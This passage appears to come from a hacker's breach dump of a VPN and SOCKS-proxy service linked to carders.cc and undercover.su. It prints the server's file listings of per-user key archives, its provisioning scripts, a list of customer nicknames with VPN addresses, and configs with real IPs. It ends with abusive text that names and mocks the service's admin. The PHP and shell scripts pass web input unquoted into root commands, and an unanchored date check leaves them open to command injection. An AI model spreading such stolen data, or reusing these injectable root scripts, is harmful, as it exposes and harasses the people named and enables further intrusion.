Jul 16 00:19 puttin29618_OPENVPN.tgz +-rw-r--r-- 1 root root 3575 Nov 22 18:53 r0fLyyy20540_OPENVPN.tgz +-rw-r--r-- 1 root root 3601 Jul 20 20:45 recoilcontrol13838_OPENVPN.tgz +-rw-r--r-- 1 root root 3601 Oct 31 05:55 recoilcontrol14436_OPENVPN.tgz +-rw-r--r-- 1 root root 3605 Jul 20 23:48 recoilcontrol16539_OPENVPN.tgz +-rw-r--r-- 1 root root 3589 Jul 20 20:45 recoilcontrol20256_OPENVPN.tgz +-rw-r--r-- 1 root root 3595 Aug 24 23:41 recoilcontrol20435_OPENVPN.tgz +-rw-r--r-- 1 root root 3595 Sep 25 22:59 recoilcontrol22600_OPENVPN.tgz +-rw-r--r-- 1 root root 3602 Dec 10 06:48 recoilcontrol24867_OPENVPN.tgz +-rw-r--r-- 1 root root 3578 Dec 7 12:24 reideen31055_OPENVPN.tgz +-rw-r--r-- 1 root root 3565 Oct 27 16:49 reideen4694_OPENVPN.tgz +-rw-r--r-- 1 root root 3429 Jun 13 2010 rew133711075_OPENVPN.tgz +-rw-r--r-- 1 root root 3406 Dec 4 15:25 rich9024721_OPENVPN.tgz +-rw-r--r-- 1 root root 3586 Dec 19 15:48 ripit25423_OPENVPN.tgz +-rw-r--r-- 1 root root 3392 Sep 25 15:40 romulus8910580_OPENVPN.tgz +-rw-r--r-- 1 root root 3606 Jun 5 2010 s1cks1ck7058_OPENVPN.tgz +-rw-r--r-- 1 root root 3425 Jun 27 2010 saidone3692_OPENVPN.tgz +-rw-r--r-- 1 root root 3432 Jul 10 10:52 santaly22171_OPENVPN.tgz +-rw-r--r-- 1 root root 3428 May 12 2010 schmali30094_OPENVPN.tgz +-rw-r--r-- 1 root root 3421 Jul 5 2010 schmali8853_OPENVPN.tgz +-rw-r--r-- 1 root root 3589 Nov 15 21:35 sh0ck11639_OPENVPN.tgz +-rw-r--r-- 1 root root 3571 Nov 1 01:54 shitpro46_OPENVPN.tgz +-rw-r--r-- 1 root root 3604 Aug 26 22:09 shizomitzu29204_OPENVPN.tgz +-rw-r--r-- 1 root root 3586 Dec 3 09:02 shore17470_OPENVPN.tgz +-rw-r--r-- 1 root root 3407 Dec 7 14:34 sidosido1233174_OPENVPN.tgz +-rw-r--r-- 1 root root 3613 Jul 22 20:39 sirmaliq9030397_OPENVPN.tgz +-rw-r--r-- 1 root root 3407 Dec 2 07:36 slic3menic38769_OPENVPN.tgz +-rw-r--r-- 1 root root 3411 Nov 10 22:47 snowghost17906_OPENVPN.tgz +-rw-r--r-- 1 root root 3561 Nov 28 08:57 someone1895_OPENVPN.tgz +-rw-r--r-- 1 root root 3434 Jun 25 2010 someone22369_OPENVPN.tgz +-rw-r--r-- 1 root root 3593 Aug 4 23:47 souliloquist11153_OPENVPN.tgz +-rw-r--r-- 1 root root 3423 Jul 4 2010 souliloquist12695_OPENVPN.tgz +-rw-r--r-- 1 root root 3594 Aug 4 23:48 souliloquist25034_OPENVPN.tgz +-rw-r--r-- 1 root root 3586 Nov 8 03:26 spran32726_OPENVPN.tgz +-rw-r--r-- 1 root root 30730 Jan 7 19:07 sshCreateLog +-rw-r--r-- 1 root root 3579 Aug 15 01:11 st0ne24184_OPENVPN.tgz +-rw-r--r-- 1 root root 3573 Oct 31 00:13 stage666761_OPENVPN.tgz +-rw-r--r-- 1 root root 3409 Aug 2 21:41 stevy265130526_OPENVPN.tgz +-rw-r--r-- 1 root root 3568 Oct 14 22:12 store2410563_OPENVPN.tgz +-rw-r--r-- 1 root root 3600 Sep 7 14:57 stronger8718968_OPENVPN.tgz +-rw-r--r-- 1 root root 3419 Oct 4 01:35 styler12729_OPENVPN.tgz +-rw-r--r-- 1 root root 3421 Nov 28 15:10 styles16225_OPENVPN.tgz +-rw-r--r-- 1 root root 3424 Oct 18 07:43 styles18650_OPENVPN.tgz +-rw-r--r-- 1 root root 3604 Sep 29 17:37 suc4life19475_OPENVPN.tgz +-rw-r--r-- 1 root root 3597 Aug 24 20:28 suc4life9834_OPENVPN.tgz +-rw-r--r-- 1 root root 3625 Jun 20 2010 sudeki25957_OPENVPN.tgz +-rw-r--r-- 1 root root 3572 Dec 23 13:58 sunrise20870_OPENVPN.tgz +-rw-r--r-- 1 root root 3401 Nov 29 12:31 supersixten16431_OPENVPN.tgz +-rw-r--r-- 1 root root 3582 Nov 8 19:05 t0xus32177_OPENVPN.tgz +-rw-r--r-- 1 root root 3590 Sep 2 23:25 t0xus6444_OPENVPN.tgz +-rw-r--r-- 1 root root 3400 Nov 24 21:34 tahBOUNTY24202_OPENVPN.tgz +-rw-r--r-- 1 root root 3590 Nov 12 19:12 tanjo21492_OPENVPN.tgz +-rw-r--r-- 1 root root 3576 Sep 9 18:20 tanjo28945_OPENVPN.tgz +-rw-r--r-- 1 root root 3564 Nov 27 10:06 termate24530_OPENVPN.tgz +-rw-r--r-- 1 root root 4 Sep 16 23:51 test +-rw-r--r-- 1 root root 3575 Dec 5 09:06 test5699246_OPENVPN.tgz +-rw-r--r-- 1 root root 3587 Dec 29 19:18 teste8025_OPENVPN.tgz +-rw-r--r-- 1 root root 3623 Jun 11 2010 th3sh4dow15637_OPENVPN.tgz +-rw-r--r-- 1 root root 3412 Aug 29 03:36 th3sh4dow26538_OPENVPN.tgz +-rw-r--r-- 1 root root 3404 Jul 29 01:36 th3sh4dow7901_OPENVPN.tgz +-rw-r--r-- 1 root root 3427 Nov 1 18:55 theDog31533_OPENVPN.tgz +-rw-r--r-- 1 root root 3620 May 17 2010 theaSh5027_OPENVPN.tgz +-rw-r--r-- 1 root root 3421 Jan 3 20:24 thehen8300_OPENVPN.tgz +-rw-r--r-- 1 root root 3401 Nov 29 06:13 tijgertje12595_OPENVPN.tgz +-rw-r--r-- 1 root root 3608 May 13 2010 traden9010098_OPENVPN.tgz +-rw-r--r-- 1 root root 3418 Nov 8 02:41 tripit30242_OPENVPN.tgz +-rw-r--r-- 1 root root 3612 Oct 21 03:49 turboprinz18543_OPENVPN.tgz +-rw-r--r-- 1 root root 3579 Oct 19 23:35 twist2275_OPENVPN.tgz +-rw-r--r-- 1 root root 3430 May 31 2010 ucitsme12769_OPENVPN.tgz +-rw-r--r-- 1 root root 3610 Nov 24 22:52 ultrawilli21542_OPENVPN.tgz +-rw-r--r-- 1 root root 3609 Oct 15 00:46 upperfreak1495_OPENVPN.tgz +-rw-r--r-- 1 root root 3575 Jul 14 13:30 vpn2420339_OPENVPN.tgz +-rw-r--r-- 1 root root 3580 Nov 3 20:57 vpn2429681_OPENVPN.tgz +-rw-r--r-- 1 root root 22174 Jan 4 20:31 vpnCreateLog +-rw-r--r-- 1 root root 3591 Nov 10 04:35 w333d21697_OPENVPN.tgz +-rw-r--r-- 1 root root 3586 Nov 6 03:41 w333d26767_OPENVPN.tgz +-rw-r--r-- 1 root root 3586 Oct 22 01:09 w333d31139_OPENVPN.tgz +-rw-r--r-- 1 root root 3579 Sep 22 02:05 w333d4383_OPENVPN.tgz +-rw-r--r-- 1 root root 3599 May 11 2010 w333d8639_OPENVPN.tgz +-rw-r--r-- 1 root root 3579 Dec 4 09:33 w333d9676_OPENVPN.tgz +-rw-r--r-- 1 root root 3620 Jun 11 2010 war10ck133710772_OPENVPN.tgz +-rw-r--r-- 1 root root 3435 Aug 20 16:41 warmachine133724023_OPENVPN.tgz +-rw-r--r-- 1 root root 3406 Sep 3 04:18 weedneger31561_OPENVPN.tgz +-rw-r--r-- 1 root root 3418 Dec 5 08:42 weeman8818_OPENVPN.tgz +-rw-r--r-- 1 root root 3433 Jun 16 2010 werther15618_OPENVPN.tgz +-rw-r--r-- 1 root root 3591 Nov 23 19:41 winkel722094_OPENVPN.tgz +-rw-r--r-- 1 root root 3600 Aug 3 16:02 winkelmann725337_OPENVPN.tgz +-rw-r--r-- 1 root root 3585 Aug 15 16:31 woorm6760_OPENVPN.tgz +-rw-r--r-- 1 root root 3603 Oct 23 04:28 wortermilk31260_OPENVPN.tgz +-rw-r--r-- 1 root root 3597 Dec 13 19:34 wtfvpn2417141_OPENVPN.tgz +-rw-r--r-- 1 root root 3419 Aug 27 04:03 ww2dd28375_OPENVPN.tgz +-rw-r--r-- 1 root root 3580 Oct 15 16:33 x220x7914_OPENVPN.tgz +-rw-r--r-- 1 root root 3567 Dec 16 07:03 xStream14196_OPENVPN.tgz +-rw-r--r-- 1 root root 3572 Nov 9 01:51 xStream25123_OPENVPN.tgz +-rw-r--r-- 1 root root 3569 Sep 30 15:38 xStream27135_OPENVPN.tgz +-rw-r--r-- 1 root root 3425 Jul 8 2010 xStream9518_OPENVPN.tgz +-rw-r--r-- 1 root root 3575 Aug 18 03:10 xStream9635_OPENVPN.tgz +-rw-r--r-- 1 root root 3573 Sep 17 01:50 xeqtion7314_OPENVPN.tgz +-rw-r--r-- 1 root root 3601 Nov 27 14:45 xx1337xx4652_OPENVPN.tgz +-rw-r--r-- 1 root root 3608 Sep 9 21:16 xxkev200xx24744_OPENVPN.tgz +-rw-r--r-- 1 root root 3412 Jul 17 07:25 zer00063_OPENVPN.tgz +-rw-r--r-- 1 root root 3638 May 15 2010 zetinator10057_OPENVPN.tgz + +# ls -la | grep -v tgz +total 2388 +drwxr-xr-x 3 root root 36864 Jan 4 20:32 . +drwxr-xr-x 14 root root 4096 Feb 2 2010 .. +-rw------- 1 root root 1024 Jan 4 20:17 .rnd +-rw-r--r-- 1 root root 387 Sep 17 00:14 addSSHuser.php +-rw-r--r-- 1 root root 280 Sep 17 00:14 addVPNuser.php +-rwsr-sr-x 1 root root 700 May 9 2010 createSSHsocks.sh +-rwsr-sr-x 1 root root 518 May 11 2010 createVPN.sh +-rw-r--r-- 1 root root 3 May 11 2010 index.htm +-rw-r--r-- 1 root root 2 Sep 17 03:05 index.html +drwxr-xr-x 2 root root 4096 Sep 17 03:05 lighttpd +-rw-r--r-- 1 root root 30730 Jan 7 19:07 sshCreateLog +-rw-r--r-- 1 root root 4 Sep 16 23:51 test +-rw-r--r-- 1 root root 22174 Jan 4 20:31 vpnCreateLog + +# #Warning: dumb code ahead +# cat addSSHuser.php +<?php + if($_SERVER['REMOTE_ADDR'] != "92.241.190.157" ) die("<h2>404 File not found</h2>"); + // visudo www-data ALL=NOPASSWD: /var/www/createSSHsocks.sh + + if(isset($_GET['user']) && isset($_GET['pass']) && isset($_GET['date'])) + { + $user = $_GET['user']; + $pass = $_GET['pass']; + $date = $_GET['date']; + + echo shell_exec("sudo /var/www/createSSHsocks.sh $user $pass $date"); + } + +?> + +# cat createSSHsocks.sh +#!/bin/sh + +if [ $# -lt 3 ] +then + echo $0 user pass expDate + exit +fi + +if ! echo $1 | grep -q -e "^[a-zA-Z0-9]*$" +then + echo "Invalid User" + exit +fi +if ! echo $2 | grep -q -e "^[a-zA-Z0-9]*$" +then + echo "Invalid Pass" + exit +fi +if ! echo $3 | grep -q -E "[0-9]{4}-[0-9]{2}-[0-9]{2}" +then + echo "Invalid ExpDate" + exit +fi + +user=$1 +pass=$2 +exp=$3 + +echo "`date`: $user $pass $date" >> sshCreateLog + +if [ ! -d /home/SSHUSER ] +then + echo "Creating /home/SSHUSER" + mkdir /home/SSHUSER +fi + +crpass=$(perl -e"`echo \"print crypt(\\\"$pass\\\", \\\"itsMySalt\\\")\"`") +deluser $user +useradd --home /home/SSHUSER --expiredate $exp --password $crpass --shell /usr/sbin/nologin $user + +$ cat addVPNuser.php +<?php + if($_SERVER['REMOTE_ADDR'] != "92.241.190.157" ) die("<h2>404 File not found</h2>"); + // visudo www-data ALL=NOPASSWD: /var/www/createVPN.sh + + if(isset($_GET['user'])) + { + $user = $_GET['user']; + echo shell_exec("sudo /var/www/createVPN.sh $user 2> /dev/null"); + } + +?> + +# cat createVPN.sh +#!/bin/sh + +if [ $# -lt 1 ] +then + echo $0 user + exit +fi + +if ! echo $1 | grep -q -e "^[a-zA-Z0-9]*$" +then + echo "Invalid User" + exit +fi + +user=$1 +dir=`pwd` + +echo "`date`: $user" >> vpnCreateLog + +cd /etc/openvpn/easy-rsa/2.0 #MAD AES-1024 RIGHT HEEEERE +source ./vars >> /dev/null 2> /dev/null +./build-key --batch $user >> /dev/null 2> /dev/null + +fn=`echo "${user}${RANDOM}_OPENVPN.tgz"` + +cd keys/ +sed -e "s/_NAME_/$user/g" client.conf > ${user}_OVPN.ovpn +tar cfz $fn $user.crt $user.key ca.crt ${user}_OVPN.ovpn +mv $fn /var/www/ +cd $dir +echo $fn + +# cd /etc/openvpn/ && ls -la +total 48 +drwxr-xr-x 4 root root 4096 Sep 17 03:20 . +drwxr-xr-x 70 root root 4096 Jan 7 19:07 .. +drwxr-xr-x 2 root root 4096 May 9 2010 certs +-rw-r--r-- 1 root root 3427 May 9 2010 client.conf +drwxr-xr-x 4 root root 4096 May 9 2010 easy-rsa +-rw------- 1 root root 1187 Jan 7 21:44 ipp.txt +---------- 1 root root 356 May 12 2010 openvpn-status.log +---------- 1 root root 160 May 18 2010 openvpn.log +-rw-r--r-- 1 root root 10388 Aug 9 23:09 server.conf +-rw------- 1 root root 0 May 18 2010 status.log +-rwxr-xr-x 1 root root 1352 Sep 18 2008 update-resolv-conf + +# cat ipp.txt +Dukeraider,10.8.0.4 +WEEDtwo,10.8.0.8 +elektro,10.8.0.12 +21Kms,10.8.0.16 +darkt0wn,10.8.0.20 +hi,10.8.0.24 +w333d,10.8.0.28 +SleepyHollow,10.8.0.32 +HonigMelone,10.8.0.36 +SmileNike,10.8.0.40 +becks,10.8.0.44 +sunrise,10.8.0.48 +papa42,10.8.0.52 +malakas2,10.8.0.56 +Fahne,10.8.0.60 +freshestman,10.8.0.64 +kobra,10.8.0.68 +Thunder0,10.8.0.72 +juden,10.8.0.76 +b7231,10.8.0.80 +mablutze,10.8.0.84 +Kerber0s,10.8.0.88 +Loader,10.8.0.92 +latestnews,10.8.0.96 +Sa1nt8564,10.8.0.100 +SilverFox,10.8.0.104 +nate23,10.8.0.108 +pan1c,10.8.0.112 +Ginal406,10.8.0.116 +Mantis70,10.8.0.120 +kstARRR,10.8.0.124 +h3l0x,10.8.0.128 +reideen,10.8.0.132 +conviction,10.8.0.136 +awesome,10.8.0.140 +recoilcontrol,10.8.0.144 +jack123,10.8.0.148 +chiller1337,10.8.0.152 +hung2304,10.8.0.156 +Tiberius,10.8.0.160 +Kolumbus,10.8.0.164 +Delphinko,10.8.0.168 +McKnad,10.8.0.172 +Kamill,10.8.0.176 +kevin4ual,10.8.0.180 +SleepyHollow,10.8.0.184 +N3v10,10.8.0.188 +shore,10.8.0.192 +kingpok,10.8.0.196 +xStream,10.8.0.200 +Kasanova,10.8.0.204 +andreas7411,10.8.0.208 +slic3menic3,10.8.0.212 +FaxXer,10.8.0.216 +Pitbull69,10.8.0.220 +b1111,10.8.0.224 +obama123,10.8.0.228 +Alanka,10.8.0.232 +oicw91,10.8.0.236 +weeman,10.8.0.240 +fuckdawn,10.8.0.244 +docscanner,10.8.0.248 + +# cat server.conf +################################################# +# Sample OpenVPN 2.0 config file for # +# multi-client server. # +# # +# This file is for the server side # +# of a many-clients <-> one-server # +# OpenVPN configuration. # +# # +# OpenVPN also supports # +# single-machine <-> single-machine # +# configurations (See the Examples page # +# on the web site for more info). # +# # +# This config should work on Windows # +# or Linux/BSD systems. Remember on # +# Windows to quote pathnames and use # +# double backslashes, e.g.: # +# "C:\\Program Files\\OpenVPN\\config\\foo.key" # +# # +# Comments are preceded with '#' or ';' # +################################################# + +# Which local IP address should OpenVPN +# listen on? (optional) +;local a.b.c.d + +# Which TCP/UDP port should OpenVPN listen on? +# If you want to run multiple OpenVPN instances +# on the same machine, use a different port +# number for each one. You will need to +# open up this port on your firewall. +port 1194 + +# TCP or UDP server? +;proto tcp +proto udp + +# "dev tun" will create a routed IP tunnel, +# "dev tap" will create an ethernet tunnel. +# Use "dev tap0" if you are ethernet bridging +# and have precreated a tap0 virtual interface +# and bridged it with your ethernet interface. +# If you want to control access policies +# over the VPN, you must create firewall +# rules for the the TUN/TAP interface. +# On non-Windows systems, you can give +# an explicit unit number, such as tun0. +# On Windows, use "dev-node" for this. +# On most systems, the VPN will not function +# unless you partially or fully disable +# the firewall for the TUN/TAP interface. +;dev tap +dev tun + +# Windows needs the TAP-Win32 adapter name +# from the Network Connections panel if you +# have more than one. On XP SP2 or higher, +# you may need to selectively disable the +# Windows firewall for the TAP adapter. +# Non-Windows systems usually don't need this. +;dev-node MyTap + +# SSL/TLS root certificate (ca), certificate +# (cert), and private key (key). Each client +# and the server must have their own cert and +# key file. The server and all clients will +# use the same ca file. +# +# See the "easy-rsa" directory for a series +# of scripts for generating RSA certificates +# and private keys. Remember to use +# a unique Common Name for the server +# and each of the client certificates. +# +# Any X509 key management system can be used. +# OpenVPN can also use a PKCS #12 formatted key file +# (see "pkcs12" directive in man page). +ca certs/ca.crt +cert certs/server.crt +key certs/server.key # This file should be kept secret + +# Diffie hellman parameters. +# Generate your own with: +# openssl dhparam -out dh1024.pem 1024 +# Substitute 2048 for 1024 if you are using +# 2048 bit keys. +dh certs/dh1024.pem + +# Configure server mode and supply a VPN subnet +# for OpenVPN to draw client addresses from. +# The server will take 10.8.0.1 for itself, +# the rest will be made available to clients. +# Each client will be able to reach the server +# on 10.8.0.1. Comment this line out if you are +# ethernet bridging. See the man page for more info. +server 10.8.0.0 255.255.255.0 + +# Maintain a record of client <-> virtual IP address +# associations in this file. If OpenVPN goes down or +# is restarted, reconnecting clients can be assigned +# the same virtual IP address from the pool that was +# previously assigned. +ifconfig-pool-persist ipp.txt + +# Configure server mode for ethernet bridging. +# You must first use your OS's bridging capability +# to bridge the TAP interface with the ethernet +# NIC interface. Then you must manually set the +# IP/netmask on the bridge interface, here we +# assume 10.8.0.4/255.255.255.0. Finally we +# must set aside an IP range in this subnet +# (start=10.8.0.50 end=10.8.0.100) to allocate +# to connecting clients. Leave this line commented +# out unless you are ethernet bridging. +;server-bridge 10.8.0.4 255.255.255.0 10.8.0.50 10.8.0.100 + +# Configure server mode for ethernet bridging +# using a DHCP-proxy, where clients talk +# to the OpenVPN server-side DHCP server +# to receive their IP address allocation +# and DNS server addresses. You must first use +# your OS's bridging capability to bridge the TAP +# interface with the ethernet NIC interface. +# Note: this mode only works on clients (such as +# Windows), where the client-side TAP adapter is +# bound to a DHCP client. +;server-bridge + +# Push routes to the client to allow it +# to reach other private subnets behind +# the server. Remember that these +# private subnets will also need +# to know to route the OpenVPN client +# address pool (10.8.0.0/255.255.255.0) +# back to the OpenVPN server. +;push "route 192.168.10.0 255.255.255.0" +;push "route 192.168.20.0 255.255.255.0" + +# To assign specific IP addresses to specific +# clients or if a connecting client has a private +# subnet behind it that should also have VPN access, +# use the subdirectory "ccd" for client-specific +# configuration files (see man page for more info). + +# EXAMPLE: Suppose the client +# having the certificate common name "Thelonious" +# also has a small subnet behind his connecting +# machine, such as 192.168.40.128/255.255.255.248. +# First, uncomment out these lines: +;client-config-dir ccd +;route 192.168.40.128 255.255.255.248 +# Then create a file ccd/Thelonious with this line: +# iroute 192.168.40.128 255.255.255.248 +# This will allow Thelonious' private subnet to +# access the VPN. This example will only work +# if you are routing, not bridging, i.e. you are +# using "dev tun" and "server" directives. + +# EXAMPLE: Suppose you want to give +# Thelonious a fixed VPN IP address of 10.9.0.1. +# First uncomment out these lines: +;client-config-dir ccd +;route 10.9.0.0 255.255.255.252 +# Then add this line to ccd/Thelonious: +# ifconfig-push 10.9.0.1 10.9.0.2 + +# Suppose that you want to enable different +# firewall access policies for different groups +# of clients. There are two methods: +# (1) Run multiple OpenVPN daemons, one for each +# group, and firewall the TUN/TAP interface +# for each group/daemon appropriately. +# (2) (Advanced) Create a script to dynamically +# modify the firewall in response to access +# from different clients. See man +# page for more info on learn-address script. +;learn-address ./script + +# If enabled, this directive will configure +# all clients to redirect their default +# network gateway through the VPN, causing +# all IP traffic such as web browsing and +# and DNS lookups to go through the VPN +# (The OpenVPN server machine may need to NAT +# or bridge the TUN/TAP interface to the internet +# in order for this to work properly). +push "redirect-gateway def1" +push "dhcp-option DNS 92.241.168.201" + +# Certain Windows-specific network settings +# can be pushed to clients, such as DNS +# or WINS server addresses. CAVEAT: +# http://openvpn.net/faq.html#dhcpcaveats +# The addresses below refer to the public +# DNS servers provided by opendns.com. +;push "dhcp-option DNS 208.67.222.222" +;push "dhcp-option DNS 208.67.220.220" + +# Uncomment this directive to allow different +# clients to be able to "see" each other. +# By default, clients will only see the server. +# To force clients to only see the server, you +# will also need to appropriately firewall the +# server's TUN/TAP interface. +;client-to-client + +# Uncomment this directive if multiple clients +# might connect with the same certificate/key +# files or common names. This is recommended +# only for testing purposes. For production use, +# each client should have its own certificate/key +# pair. +# +# IF YOU HAVE NOT GENERATED INDIVIDUAL +# CERTIFICATE/KEY PAIRS FOR EACH CLIENT, +# EACH HAVING ITS OWN UNIQUE "COMMON NAME", +# UNCOMMENT THIS LINE OUT. +;duplicate-cn + +# The keepalive directive causes ping-like +# messages to be sent back and forth over +# the link so that each side knows when +# the other side has gone down. +# Ping every 10 seconds, assume that remote +# peer is down if no ping received during +# a 120 second time period. +keepalive 10 120 + +# For extra security beyond that provided +# by SSL/TLS, create an "HMAC firewall" +# to help block DoS attacks and UDP port flooding. +# +# Generate with: +# openvpn --genkey --secret ta.key +# +# The server and each client must have +# a copy of this key. +# The second parameter should be '0' +# on the server and '1' on the clients. +;tls-auth ta.key 0 # This file is secret + +# Select a cryptographic cipher. +# This config item must be copied to +# the client config file as well. +;cipher BF-CBC # Blowfish (default) +;cipher AES-128-CBC # AES +;cipher DES-EDE3-CBC # Triple-DES + +# Enable compression on the VPN link. +# If you enable it here, you must also +# enable it in the client config file. +comp-lzo + +# The maximum number of concurrently connected +# clients we want to allow. +;max-clients 100 + +# It's a good idea to reduce the OpenVPN +# daemon's privileges after initialization. +# +# You can uncomment this out on +# non-Windows systems. +;user nobody +;group nogroup + +# The persist options will try to avoid +# accessing certain resources on restart +# that may no longer be accessible because +# of the privilege downgrade. +persist-key +persist-tun + +# Output a short status file showing +# current connections, truncated +# and rewritten every minute. +status /dev/null +#status.log + +# By default, log messages will go to the syslog (or +# on Windows, if running as a service, they will go to +# the "\Program Files\OpenVPN\log" directory). +# Use log or log-append to override this default. +# "log" will truncate the log file on OpenVPN startup, +# while "log-append" will append to it. Use one +# or the other (but not both). +log /dev/null +;log-append openvpn.log + +# Set the appropriate level of log +# file verbosity. +# +# 0 is silent, except for fatal errors +# 4 is reasonable for general usage +# 5 and 6 can help to debug connection problems +# 9 is extremely verbose +verb 0 + +# Silence repeating messages. At most 20 +# sequential messages of the same message +# category will be output to the log. +;mute 20 + +crl-verify /etc/openvpn/easy-rsa/2.0/keys/crl.pem + +$ cat /etc/sockd.conf +# $Id: sockd.conf,v 1.49 2009/10/27 11:56:55 karls Exp $ +# +# A sample sockd.conf +# +# +# The configfile is divided into three parts; +# 1) serversettings +# 2) rules +# 3) routes +# +# The recommended order is: +# Serversettings: +# logoutput +# internal +# external +# method +# clientmethod +# users +# compatibility +# extension +# timeout +# srchost +# +# Rules: +# client block/pass +# from to +# libwrap +# log +# +# block/pass +# from to +# method +# command +# libwrap +# log +# protocol +# proxyprotocol +# +# Routes: + +# the server will log both via syslog, to stdout and to /var/log/lotsoflogs +#logoutput: syslog stdout /var/log/lotsoflogs +logoutput: /dev/null + +# The server will bind to the address 10.1.1.1, port 1080 and will only +# accept connections going to that address. +internal: 92.241.190.253 port = 14421 +# Alternatively, the interface name can be used instead of the address. +#internal: eth0 port = 1080 + +# all outgoing connections from the server will use the IP address +# 195.168.1.1 +external: 92.241.190.253 + +# list over acceptable methods, order of preference. +# A method not set here will never be selected. +# +# If the method field is not set in a rule, the global +# method is filled in for that rule. +# + +# methods for socks-rules. +method: username +#none #rfc931 + +# methods for client-rules. +#clientmethod: none + +#or if you want to allow rfc931 (ident) too +#method: username rfc931 none + +#or for PAM authentification +#method: pam + +# +# User identities, an important section. +# + +# when doing something that can require privilege, it will use the +# userid "sockd". +#user.privileged: sockd + +# when running as usual, it will use the unprivileged userid of "sockd". +#user.unprivileged: sockd + +# If you compiled with libwrap support, what userid should it use +# when executing your libwrap commands? "libwrap". +#user.libwrap: libwrap + + +# +# Some options to help clients with compatibility: +# + +# when a client connection comes in the socksserver will try to use +# the same port as the client is using, when the socksserver +# goes out on the clients behalf (external: IP address). +# If this option is set, Dante will try to do it for reserved ports aswell. +# This will usually require user.privileged to be set to "root". +#compatibility: sameport + +# If you are using the bind extension and have trouble running servers +# via the server, you might try setting this. The consequences of it +# are unknown. +#compatibility: reuseaddr + +# +# The Dante server supports some extensions to the socks protocol. +# These require that the socks client implements the same extension and +# can be enabled using the "extension" keyword. +# +# enable the bind extension. +#extension: bind + + +# +# Misc options. +# + +# how many seconds can pass from when a client connects til it has +# sent us it's request? Adjust according to your network performance +# and methods supported. +#timeout.negotiate: 30 # on a lan, this should be enough. + +# how many seconds can the client and it's peer idle without sending +# any data before we dump it? Unless you disable tcp keep-alive for +# some reason, it's probably best to set this to 0, which is +# "forever". +timeout.io: 0 # or perhaps 86400, for a day. + +# do you want to accept connections from addresses without +# dns info? what about addresses having a mismatch in dnsinfo? +#srchost: nounknown nomismatch + +# +# The actual rules. There are two kinds and they work at different levels. +# +# The rules prefixed with "client" are checked first and say who is allowed +# and who is not allowed to speak/connect to the server. I.e the +# ip range containing possibly valid clients. +# It is especially important that these only use IP addresses, not hostnames, +# for security reasons. +# +# The rules that do not have a "client" prefix are checked later, when the +# client has sent its request and are used to evaluate the actual +# request. +# +# The "to:" in the "client" context gives the address the connection +# is accepted on, i.e the address the socksserver is listening on, or +# just "0.0.0.0/0" for any address the server is listening on. +# +# The "to:" in the non-"client" context gives the destination of the clients +# socksrequest. +# +# "from:" is the source address in both contexts. +# + + +# +# The "client" rules. All our clients come from the net 10.0.0.0/8. +# + +# Allow our clients, also provides an example of the port range command. +client pass { + from: 0.0.0.0/0 port 1-65535 to: 0.0.0.0/0 + #method: rfc931 # match all idented users that also are in passwordfile +} + +# This is identical to above, but allows clients without a rfc931 (ident) +# too. In practise this means the socksserver will try to get a rfc931 +# reply first (the above rule), if that fails, it tries this rule. +#client pass { +# from: 10.0.0.0/8 port 1-65535 to: 0.0.0.0/0 +#} + + +# drop everyone else as soon as we can and log the connect, they are not +# on our net and have no business connecting to us. This is the default +# but if you give the rule yourself, you can specify details. +#client block { +# from: 0.0.0.0/0 to: 0.0.0.0/0 +# log: connect error +#} + + +# the rules controlling what clients are allowed what requests +# + +# you probably don't want people connecting to loopback addresses, +# who knows what could happen then. +#block { +# from: 0.0.0.0/0 to: lo0 +# log: connect error +#} + +# the people at the 172.16.0.0/12 are bad, no one should talk to them. +# log the connect request and also provide an example on how to +# interact with libwrap. +#block { +# from: 0.0.0.0/0 to: 172.16.0.0/12 +# libwrap: spawn finger @%a +# log: connect error +#} + +# unless you need it, you could block any bind requests. +#block { +# from: 0.0.0.0/0 to: 0.0.0.0/0 +# command: bind +# log: connect error +#} + +# or you might want to allow it, for instance "active" ftp uses it. +# Note that a "bindreply" command must also be allowed, it +# should usually by from "0.0.0.0/0", i.e if a client of yours +# has permission to bind, it will also have permission to accept +# the reply from anywhere. +pass { + from: 0.0.0.0/0 to: 0.0.0.0/0 +# command: bind +# log: connect error +} + +# some connections expect some sort of "reply", this might be +# the reply to a bind request or it may be the reply to a +# udppacket, since udp is packetbased. +# Note that nothing is done to verify that it's a "genuine" reply, +# that is in general not possible anyway. The below will allow +# all "replies" in to your clients at the 10.0.0.0/8 net. +#pass { +# from: 0.0.0.0/0 to: 10.0.0.0/8 +# command: bindreply udpreply +# log: connect error +#} + + +# pass any http connects to the example.com domain if they +# authenticate with username. +# This matches "example.com" itself and everything ending in ".example.com". +#pass { +# from: 10.0.0.0/8 to: .example.com port = http +# log: connect error +# method: username +#} + + +# block any other http connects to the example.com domain. +#block { +# from: 0.0.0.0/0 to: .example.com port = http +# log: connect error +#} + +# everyone from our internal network, 10.0.0.0/8 is allowed to use +# tcp and udp for everything else. +#pass { +# from: 10.0.0.0/8 to: 0.0.0.0/0 +# protocol: tcp udp +#} + +# last line, block everyone else. This is the default but if you provide +# one yourself you can specify your own logging/actions +#block { +# from: 0.0.0.0/0 to: 0.0.0.0/0 +# log: connect error +#} + +# route all http connects via an upstream socks server, aka "server-chaining". +#route { +# from: 10.0.0.0/8 to: 0.0.0.0/0 port = http via: socks.example.net port = socks +#} + + +All in all this really shouldn't surprise anyone. Carders.cc was told +to fuck off twice now and we're tired of cleaning their shit up. +Seriously, it's not a secret that carders.cc's team members are a bit +dim, though even they should have got the hint by now. Why don't you +go out, steal some handbags or whatever scum does at your age? This is +not only a warning to you but also to your users; don't put your trust +in admins that are that fucking incapable, because if you do, you will +be owned and your data will be exp0sed. - AGAIN - + + ,;~;, + /\_ + ( / + (() //) + | \\ ,,;;'\ + __ _( )m=((((((((((((((========{ Undercover.su }======------- + /' ' '()/~' '.(, | + ,;( )|| | ~ k!LLu, well, what can be said about him? He's +,;' \ /-(.;, ) probably the most attention-whoring and at the + ) / ) / same time the most hated kid around. He spends + // || his time lurking around on kiddyboards, bragging + )_\ )_\ about his imaginary achievements and skills. He +changes his nickname more frequently than his underwear but usually +gets uncovered instantly due to his obtrusive arrogance and stupidity. +All in all he is hands-down the most annoying little brat around. +Clearly, this self-proclaimed hosting-pro and his most recent strokes +of genius "Secure-Host", "Undercover.su" and "Snap Reloaded" have to +be dealt with. k!LLu aka s1mpl3x aka purplera1n gave his best to make +his board ("application only") look more private and exclusive than a +dinner with the president. Probably this is why even Fukushima looks +crowded compared to undercover.su. But what can we say? He begged for +it so we owned him anyway; in fact we're presenting you all of his +"projects" torn to pieces. + ____________________________________________________________________ +| __ __ | +| 